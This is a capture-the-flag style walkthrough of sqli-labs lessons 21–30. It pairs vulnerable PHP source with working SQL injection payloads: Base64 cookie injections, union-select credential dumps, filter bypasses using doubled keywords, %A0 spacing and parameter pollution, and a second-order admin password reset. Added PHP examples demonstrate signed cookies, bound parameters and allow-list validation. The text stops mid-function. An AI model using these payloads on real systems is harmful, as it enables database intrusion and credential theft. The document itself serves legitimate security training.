SQLI-LAB practice notes (Less 21 - Less 30)


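The following are just the notes I wrote while working through the sqli-lab exercises; they are for reference only.
Because I have already studied some SQL injection, most of the content comes without explanation. If anything is unclear, please look it up with a search engine; you should find what you need.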

Less - 21 Cookie Injection- Error Based- complex - string

(Lesson 21: cookie injection, error-based, complex, string)

Test:

    http://localhost/sqli-lab/Less-21/index.php
        uname=Dumb&passwd=Dumb&submit=Submit

YOUR COOKIE : uname = RHVtYg== and expires: Sat 16 Jul 2016 - 08:32:26
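Note: RHVtYg== is the value of Dumb after Base64 encoding (when a value ends in one or two equals signs, Base64 is worth considering).
It can be decoded with an online Base64 encoder/decoder.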

    RHVtYlw=

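You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Dumb\') LIMIT 0,1' at line 1
Note: RHVtYlw= is the value of uname in the cookie; its plaintext is Dumb\
From this we can conclude that uname is wrapped in one layer of single quotes and one layer of parentheses.

Source Code: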

Login handling when there is no cookie:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
    setcookie('uname', base64_encode($row1['username']), time()+3600);   
    print_r(mysql_error());           
    echo '';
}else{
    print_r(mysql_error());
    echo '';   
}

Login handling when the cookie is present:

$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];           
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
$result=mysql_query($sql);
if (!$result) {
     die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row) {  
     echo 'Your Login name:'. $row['username'];    
     echo 'Your Password:' .$row['password'];
     echo 'Your ID:' .$row['id'];
} else{
     echo '';
}

Solution:

') or 1=1 #
Jykgb3IgMT0xICM=

Others:

JykgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSw2IG9yIDE9MSAj
Plaintext:   ') union select 1,database(),6 or 1=1 #

JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknICM=
Plaintext:   ') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSxncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMgICM=
Plaintext:   ') union select 1,group_concat(username),group_concat(password) from security.users  #

Note: all of the above are values of uname in the cookie

Less - 22 Cookie Injection- Error Based- Double Quotes - string

(Lesson 22: cookie injection, error-based, double quotes, string)

Test:

    http://localhost/sqli-lab/Less-21/index.php
        uname=Dumb&passwd=Dumb&submit=Submit
    RHVtYlw=

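You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"Dumb\" LIMIT 0,1' at line 1
Note: RHVtYlw= is the value of uname in the cookie; its plaintext is Dumb\
From this we can conclude that uname is wrapped in one layer of double quotes.

Source Code:

Login handling when there is no cookie: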
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1) {
    setcookie('uname', base64_encode($row1['username']), time()+3600);   
    print_r(mysql_error());           
    echo '';
}else{
    print_r(mysql_error());
    echo '';   
}
Login handling when the cookie is present:
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;  
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];                  
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
$result=mysql_query($sql);
if (!$result) {
     die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];     
     echo 'Your Password:' .$row['password'];
     echo 'Your ID:' .$row['id'];
} else{
    echo '';
}

Solution:

IiBvciAxPTEgIw==
Plaintext:   " or 1=1 #

Others:

IiB1bmlvbiBzZWxlY3QgMSxkYXRhYmFzZSgpLDYgb3IgMT0xICM=
Plaintext:   " union select 1,database(),6 or 1=1 #

IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIw==
Plaintext:   " union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodXNlcm5hbWUpLGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyAgIw==
Plaintext:   " union select 1,group_concat(username),group_concat(password) from security.users  #

Note: all of the above are values of uname in the cookie
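
Less 21 and Less 22 trust a Base64 cookie that the client can rewrite and splice the decoded value into the SQL string. The following is an added example, not sqli-labs code, of a hardened cookie path: a MAC over the payload plus a bound query parameter. COOKIE_KEY, the function names and the in-memory SQLite table (which needs the pdo_sqlite extension) are assumptions standing in for the lab's MySQL setup.

```php
<?php
// Added example, not sqli-labs code. The key, table rows and function names are constructed.
const COOKIE_KEY = 'constructed-demo-key';   // assumption: a server-side secret

// Issue "payload.mac": the Base64 payload stays readable, the MAC makes it tamper-evident.
function issueCookie(string $username): string {
    $payload = base64_encode($username);
    return $payload . '.' . hash_hmac('sha256', $payload, COOKIE_KEY);
}

// Return the username only if the MAC matches and the payload is strict Base64.
function readCookie(string $cookie): ?string {
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;                          // bare Base64, as in Less 21/22, is refused
    }
    [$payload, $mac] = $parts;
    if (!hash_equals(hash_hmac('sha256', $payload, COOKIE_KEY), $mac)) {
        return null;
    }
    $name = base64_decode($payload, true);    // strict: reject non-alphabet characters
    return ($name === false || $name === '') ? null : $name;
}

// The decoded value is bound as a parameter, so quotes and backslashes stay data.
function findByName(PDO $db, string $name): ?array {
    $stmt = $db->prepare('SELECT id, username FROM users WHERE username = ? LIMIT 1');
    $stmt->execute([$name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory table standing in for security.users.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$db->exec("INSERT INTO users (username, password) VALUES ('Dumb', 'Dumb'), ('admin', 'admin')");

$issued = issueCookie('Dumb');
$mac    = substr($issued, strpos($issued, '.'));   // ".<mac>" of the genuine cookie
$cases  = [
    'cookie as issued'           => $issued,
    'bare Base64 of Dumb'        => 'RHVtYg==',
    'payload replaced, MAC kept' => 'RHVtYlw=' . $mac,
];
foreach ($cases as $label => $cookie) {
    $name = readCookie($cookie);
    $row  = $name === null ? null : findByName($db, $name);
    printf("%-28s %s\n", $label, json_encode($row));
}

// Even without the MAC check, the bound parameter treats the page's test value Dumb\ as a name.
printf("%-28s %s\n", 'bound lookup of Dumb\\', json_encode(findByName($db, 'Dumb\\')));
```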

Less - 23 Error Based- no comments

(Lesson 23: error-based, no comments)

Test:

    http://localhost/sqli-lab/Less-23/index.php?id=2'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' LIMIT 0,1' at line 1
Note: from this we can infer that $id is wrapped in single quotes

Source Code:

//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     print_r(mysql_error());
}

Solution:

    '  or '1' = '
    http://localhost/sqli-lab/Less-23/index.php?id='  or '1' = '

    Others:
    http://localhost/sqli-lab/Less-23/index.php?id='  union select 1,version(),3 or '1' = '

    http://localhost/sqli-lab/Less-23/index.php?id='  union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '

Less - 24 Second Degree Injections

(Lesson 24: second-order injection)

Test:

    http://localhost/sqli-lab/Less-24/index.php
        username=wolf  password=1111

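Note: sqli-lab was released quite a while ago and targets an old PHP version (possibly 5.2). Some of the functions it uses have since been removed, so they have to be replaced with similar ones.

Source Code: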

login_create.php
     $link = mysqli_connect('localhost', 'root', '', 'security');
     $username=  mysqli_real_escape_string($link,$_POST['username']) ;
     $pass= mysqli_real_escape_string($link,$_POST['password']);
     $re_pass= mysqli_real_escape_string($link,$_POST['re_password']); 

     $sql = "insert into users (username, password) values(\"$username\", \"$pass\")";

login.php
   $link = mysqli_connect('localhost', 'root', '', 'security');
   $username = mysqli_real_escape_string($link,$_POST["login_user"]);
   $password = mysqli_real_escape_string($link,$_POST["login_password"]);
   $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

Solution:

    username=admin" #  password=1111
     Reset the password: change 1111 to anything (for example 666)
    username=admin  password=666 then works

Less - 25 Trick with OR & AND

(Lesson 25: tricks with OR and AND)

Test:

    http://localhost/sqli-lab/Less-25/index.php?id=1' #

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
Note: id is wrapped in single quotes

    http://localhost/sqli-lab/Less-25/index.php?id=1' --+

Note: no error

Source Code:

function blacklist($id){
    $id= preg_replace('/or/i',"", $id);
    $id= preg_replace('/AND/i',"", $id);
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
     print_r(mysql_error());
}

Note: and and or are filtered; errors are shown; $id is wrapped in single quotes

Solution:

    http://localhost/sqli-lab/Less-25/index.php?id=0' oorr 1=1 --+

    http://localhost/sqli-lab/Less-25/index.php?id=2' aandnd 1=1 --+

    Others:

    http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,version(),database()--+

    http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+

    http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+

Note: and and or are filtered, but only in a single pass, so writing the keyword doubled gets it through

Less - 25a Trick with OR & AND Blind

(Lesson 25a: tricks with OR and AND, blind injection)

Test:

    http://localhost/sqli-lab/Less-25a/index.php?id=1
    http://localhost/sqli-lab/Less-25a/index.php?id=2'
    http://localhost/sqli-lab/Less-25a/index.php?id=2"
    http://localhost/sqli-lab/Less-25a/index.php?id=2 oorr 1=1 #

Note: id is not wrapped in any quoting characters; or and and are filtered

Source Code:

function blacklist($id){
    $id= preg_replace('/or/i',"", $id);
    $id= preg_replace('/AND/i',"", $id);
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
}

Note: and and or are filtered; no errors are shown

Solution:

    http://localhost/sqli-lab/Less-25a/index.php?id=0 oorr 1=1 --+

    http://localhost/sqli-lab/Less-25a/index.php?id=2 aandnd 1=1 --+

    Others:

    http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+

    http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+

Less - 26 Trick with comments

(Lesson 26: tricks with comments)

Test:

     http://localhost/sqli-lab/Less-26/index.php?id=0'")And AND and  or OR select union  /// #--/*+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '")selectunion' LIMIT 0,1' at line 1
Note: id is wrapped only in single quotes; after filtering, only ")selectunion is left

Source Code:

function blacklist($id) {
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{  
     print_r(mysql_error());
}

Note: $id is wrapped in single quotes; or, and, /*, --, #, spaces and / are filtered

Solution:

    http://localhost/sqli-lab/Less-26/index.php?id=1'%26%26'1

    Others:

    http://localhost/sqli-lab/Less-26/index.php?id=0'%A0UNION%A0SELECT%A01,version(),database()%26%26%a0'1

    http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0'1

    http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0'1

Note: %A0 is used in place of a space, and && (%26%26) in place of AND

Less - 26a Trick with comments

(Lesson 26a: tricks with comments)

Test:

    http://localhost/sqli-lab/Less-26a/index.php?id=1')")And AND and  or OR select union  /// #--/*+

Note: after filtering, only ')")selectunion is left; no SQL query error is shown

     http://localhost/sqli-lab/Less-26a/index.php?id=1'%A0%26%26%A0 '1'='1

     http://localhost/sqli-lab/Less-26a/index.php?id=1"%A0%26%26%A0 "1"="1

     http://localhost/sqli-lab/Less-26a/index.php?id=1")%A0%26%26%A0 ("1")=("1

Note: none of these produce an error, so I do not know what the wrapping format is

    http://localhost/sqli-lab/Less-26a/index.php?id=0'%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0'1

Note: PHP errors appear; the format is probably wrong, so the query finds nothing

    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1

Note: this time it is right

Source Code:

function blacklist($id){
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {  
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
}

Note: $id is wrapped in single quotes and parentheses; or, and, /*, --, #, spaces and / are filtered

Solution:

    http://localhost/sqli-lab/Less-26a/index.php?id=1')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1

    Others:

    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,version(),database()%26%26%a0('1

    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0('1

    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0('1

Less - 27 Trick with SELECT & UNION

(Lesson 27: tricks with UNION and SELECT)

Test:

    http://localhost/sqli-lab/Less-27/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '")AndANDandorOROror' LIMIT 0,1' at line 1
Note: id is wrapped in single quotes; union, select and the characters that act as comments are filtered

Source Code:

function blacklist($id){
    $id= preg_replace('/[\/\*]/',"", $id);       //strip out /*
    $id= preg_replace('/[--]/',"", $id);          //Strip out --.
    $id= preg_replace('/[#]/',"", $id);           //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);         //Strip out spaces.
    $id= preg_replace('/select/m',"", $id);   //Strip out spaces.
    $id= preg_replace('/[ +]/',"", $id);         //Strip out spaces.
    $id= preg_replace('/union/s',"", $id);    //Strip out union
    $id= preg_replace('/select/s',"", $id);    //Strip out select
    $id= preg_replace('/UNION/s',"", $id);  //Strip out UNION
    $id= preg_replace('/SELECT/s',"", $id);   //Strip out SELECT
    $id= preg_replace('/Union/s',"", $id);     //Strip out Union
    $id= preg_replace('/Select/s',"", $id);     //Strip out select
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {  
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
     print_r(mysql_error());  
}

Solution:

    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0or(1)=(1)%26%26%a0'1

    Others:

    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0'1

    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0'1

    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0'1

Less - 27a Trick with SELECT & UNION

(Lesson 27a: tricks with UNION and SELECT)

Test:

    http://localhost/sqli-lab/Less-27a/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+

Note: no SQL query error is shown; after filtering, 0'")AndANDandorOROror is left

Source Code:

function blacklist($id){
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --.
    $id= preg_replace('/[#]/',"", $id);            //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
    $id= preg_replace('/select/m',"", $id);        //Strip out spaces.
    $id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
    $id= preg_replace('/union/s',"", $id);        //Strip out union
    $id= preg_replace('/select/s',"", $id);        //Strip out select
    $id= preg_replace('/UNION/s',"", $id);        //Strip out UNION
    $id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT
    $id= preg_replace('/Union/s',"", $id);        //Strip out Union
    $id= preg_replace('/Select/s',"", $id);        //Strip out Select
    return $id;
}
$id= blacklist($id);
$hint=$id;
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {  
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
}

Solution:

    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0or(1)=(1)%26%26%a0"1

    Others:

    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0"1

    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0"1

    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0"1

Less - 28 Trick with SELECT & UNION

(Lesson 28: tricks with UNION and SELECT)

Test:

    http://localhost/sqli-lab/Less-28/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select /// #--?/*+

Note: the combination union<space>select and all spaces are filtered; no SQL query error is shown

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect

Note: in UnIon%A0SeLect the separator is no longer a space, so it is not filtered

    http://localhost/sqli-lab/Less-28/index.php?id=0'%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0'

Note: a PHP error appears

     http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0('

Note: this one works, which shows that id is wrapped in single quotes and parentheses

Source Code:

function blacklist($id){
    $id= preg_replace('/[\/\*]/',"", $id);                //strip out /*
    $id= preg_replace('/[--]/',"", $id);                //Strip out --.
    $id= preg_replace('/[#]/',"", $id);                    //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
    $id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
    $id= preg_replace('/union\s+select/i',"", $id);        //Strip out UNION & SELECT.
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
}

Solution:

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0('

    Others:

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0('1

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0('1

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0('1

Less - 28a Trick with SELECT & UNION

(Lesson 28a: tricks with UNION and SELECT)

Test:

    http://localhost/sqli-lab/Less-28a/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select  /// #--?/*+
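Note: the combination union<space>select is filtered; no SQL query error is shown
    http://localhost/sqli-lab/Less-28a/index.php?id=1') --
Note: displays normally; spaces and the characters that act as comments are not filtered

Source Code: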

function blacklist($id){
    $id= preg_replace('/union\s+select/i',"", $id);
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{  
}

Solution:

    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,2,3--+

    Others:

    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,version(),database()--+

    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(username),group_concat(password) from security.users where 1--+
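
The filters in Less 25 through Less 28a all strip text in a single pass and then trust whatever remains. As an added example (not sqli-labs code), the following runs two of the page's filters over constructed inputs to show why that is unstable, next to an allow-list check for a numeric id; isStable() and parseId() are hypothetical names.

```php
<?php
// Added example, not sqli-labs code. The two filters are copied from the page;
// isStable() and parseId() are hypothetical helpers and every input is constructed.

function blacklist25(string $id): string {            // Less 25 / 25a
    $id = preg_replace('/or/i', "", $id);
    $id = preg_replace('/AND/i', "", $id);
    return $id;
}

function blacklist28a(string $id): string {           // Less 28a
    return preg_replace('/union\s+select/i', "", $id);
}

// A strip-style filter can only be trusted if filtering its own output changes nothing.
function isStable(callable $filter, string $input): bool {
    $once = $filter($input);
    return $filter($once) === $once;
}

// Allow-list replacement: the only accepted id is a short run of ASCII digits.
function parseId(string $raw): ?int {
    if (!ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    return (int) $raw;
}

// 1. Single-pass stripping: doubled keywords from the page's notes, then ordinary
//    values that the same filter silently rewrites.
foreach (['oorr', 'aandnd', 'infoorrmation_schema', 'password', 'Gordon', 'android'] as $s) {
    printf("%-22s -> %-20s stable=%s\n", $s, blacklist25($s),
        var_export(isStable('blacklist25', $s), true));
}

// 2. In PHP's default byte mode (no /u modifier, C locale) \s covers ASCII whitespace
//    only, so the byte 0xA0 (the page's %A0) is not a separator as far as the regex goes.
printf("space separator removed: %s\n", var_export(blacklist28a('union select') === '', true));
printf("0xA0 separator removed:  %s\n", var_export(blacklist28a("union\xA0select") === '', true));

// 3. The allow-list has no keyword list to work around.
foreach (['2', '0002', '2 ', "2\n", "2'", '', '12345678901'] as $raw) {
    printf("%-16s => %s\n", json_encode($raw), json_encode(parseId($raw)));
}
```

The integer returned by parseId() would then be bound as a query parameter rather than interpolated into the SQL string.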

Less - 29 Protection with WAF

(Lesson 29: protection with a WAF)

Test:

    http://localhost/sqli-lab/Less-29/login.php?id=0' union select 1,2,3 --+

Note: the request was detected as suspicious and redirected to another page

Source Code:

login.php
//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input) {
    $match = preg_match("/^\d+$/", $input);
    if($match) {
    }else {   
        header('Location: hacked.php');
    }
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
    $q_s = $query_string;
    $qs_array= explode("&",$q_s);
    foreach($qs_array as $key => $value) {
        $val=substr($value,0,2);
        if($val=="id") {
            $id_value=substr($value,3,30);
            return $id_value;
            echo "\n";
            break;
        }
    }
}
$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);
$id=$_GET['id'];
whitelist($id1);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
     print_r(mysql_error());
}

Solution:

    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,2,3 --+

    Others:

    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(username),group_concat(password) from security.users where 1 --+

Less - 30 Protection with WAF

(Lesson 30: protection with a WAF)

Test:

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=6

Note: the record with id 6 is displayed

Source Code:

$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);
$id=$_GET['id'];
whitelist($id1);
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {  
      echo 'Your Login name:'. $row['username'];
      echo 'Your Password:' .$row['password'];
} else{
    print_r(mysql_error());
}
//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input) {
    $match = preg_match("/^\d+$/", $input);
    if($match) {
    } else {   
        header('Location: hacked.php');
    }
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
    $q_s = $query_string;
    $qs_array= explode("&",$q_s);
     foreach($qs_array as $key => $value) {
        $val=substr($value,0,2);
        if($val=="id") {
            $id_value=substr($value,3,30);
            return $id_value;
            break;
        }
    }
}

Solution:

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,2,3 --+

    Others:

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
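
Less 29 and Less 30 validate one copy of id and build the query from another. As an added example (not sqli-labs code), the following shows the two readings side by side on constructed query strings, plus a reader that validates the same value it returns; firstId() mirrors java_implimentation() from the page, while lastId() and readId() are hypothetical names.

```php
<?php
// Added example, not sqli-labs code. firstId() mirrors java_implimentation() from the
// page; lastId() and readId() are hypothetical names and the query strings are constructed.

// What the lab's check inspects: the first "id" pair in the raw query string.
function firstId(string $qs): ?string {
    foreach (explode('&', $qs) as $pair) {
        if (substr($pair, 0, 2) === 'id') {
            return substr($pair, 3, 30);
        }
    }
    return null;
}

// What the query receives: PHP keeps the last occurrence in $_GET['id'].
function lastId(string $qs): ?string {
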